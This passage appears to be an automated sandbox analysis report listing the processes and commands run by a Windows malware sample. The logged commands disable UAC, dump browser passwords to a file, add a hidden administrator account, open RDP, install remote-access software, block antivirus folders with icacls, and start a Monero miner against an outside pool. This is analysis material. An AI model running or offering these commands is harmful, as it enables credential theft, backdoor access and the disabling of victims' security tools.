| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\ProgramData\Microsoft\Intel\Logs.exe
C:\ProgramData\Microsoft\Intel\Logs.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Programdata\Microsoft\Intel\L.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\ProgramData\Microsoft\Intel\winit.exe
C:\ProgramData\Microsoft\Intel\winit.exe -pnaxui
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"
C:\Programdata\Windows\winit.exe
"C:\Programdata\Windows\winit.exe"
C:\ProgramData\Microsoft\Intel\Cheat.exe
C:\ProgramData\Microsoft\Intel\Cheat.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Programdata\Windows\install.bat" "
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\programdata\microsoft\intel\svchost.exe
"C:\programdata\microsoft\intel\svchost.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\programdata\microsoft\rootsystem\P.exe
"C:\programdata\microsoft\rootsystem\P.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\programdata\microsoft\rootsystem\1.exe
C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop swprv
C:\Windows\SysWOW64\sc.exe
sc stop swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config swprv start= disabled
C:\Windows\SysWOW64\sc.exe
sc config swprv start= disabled
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop crmsvc
C:\Windows\SysWOW64\sc.exe
sc stop crmsvc
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Programdata\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Programdata\Windows\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\programdata\microsoft\intel\winlogon.exe
"C:\programdata\microsoft\intel\winlogon.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\342A.tmp\342B.bat C:\programdata\microsoft\intel\winlogon.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Programdata\Windows\rutserv.exe
rutserv.exe /start
C:\Programdata\Windows\rutserv.exe
C:\Programdata\Windows\rutserv.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\olly.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\Iostream.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\olly.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\Iostream.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\SystemIdle.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\SystemIdle.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\Vega.exe
C:\ProgramData\Microsoft\Intel\Vega.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe -p123
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\programdata\microsoft\intel\Vegas.exe
"C:\programdata\microsoft\intel\Vegas.exe"
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\3FB0.bat C:\programdata\microsoft\intel\Vegas.exe"
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2496426321559715893-715383930173903797410824589371338692808-14165336261723546714"
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\systemreset.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1125104392467479991220759687-2797904912987947706776747891109717815890614367"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\programdata\microsoft\intel\MOS.exe
C:\programdata\microsoft\intel\MOS.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\systemreset.exe /setowner Admin
C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"
C:\Windows\system32\icacls.exe
icacls "c:\windows\system32\systemreset.exe" /grant:r Admin:F
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\R.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Programdata\Microsoft\Intel\OS.bat" "
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
\??\c:\Programdata\Microsoft\Intel\Cheat64.exe
"c:\Programdata\Microsoft\Intel\Cheat64.exe" /qn
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\bat.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\programdata\microsoft\temp\H.bat
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" "John" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" "John" /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12878957941458200652-1133000543830729389-57444967717600126641742447826859681209"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\ProgramData\RealtekHD\taskhostw.exe
C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-831351801593215769-1523285861692278870-18790582-1436941666-1223322341-889191422"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7984462611013141898417820357591906659118825637990149113821619294987609138"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1017276001-12350836638276092552594315952141084285-465710304-998224870-863252447"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-400640227197694249-1869667779-141413013-3596850921438556474-1057006139821011440"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\ProgramData\WindowsTask\AppHost.exe
C:\ProgramData\WindowsTask\AppHost.exe -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] --donate-level=1 -p x -t4
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\GOOGLE /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\hhsm /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\hhsm /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\Cefunpacked /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\windowsnode /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\GOOGLE /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\hhsm /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\hhsm /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\Cefunpacked /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\prefssecure /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\MicrosoftCorporation /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\prefssecure /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
